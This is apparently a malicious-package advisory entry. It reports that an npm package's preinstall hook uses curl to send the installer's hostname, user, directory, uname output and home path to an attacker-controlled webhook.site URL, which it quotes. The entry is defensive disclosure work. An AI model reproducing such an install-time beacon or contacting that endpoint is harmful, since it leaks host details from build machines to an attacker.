MAL-2026-5830

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1945d7aee54e60800e30f150e6db8042fa3aee9ea99f6b5a4ab14e2a1c26571d) package.json declares a preinstall lifecycle hook that runs `curl` against `https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f`, passing the installer's hostname, current user, working directory, full `uname -a` output, and `$HOME` as query parameters. The beacon fires automatically on `npm install` with no user interaction. The package ships no source files, declares no main entry, and uses the implausible version `9.9.9` — the canonical shape of a dependency-confusion / typosquat reconnaissance package targeting builds that may resolve a private `unico-check` from the public registry. The package's only effect on installation is to leak host identifiers to an anonymous, attacker-controlled webhook.site bin, staging follow-on compromise.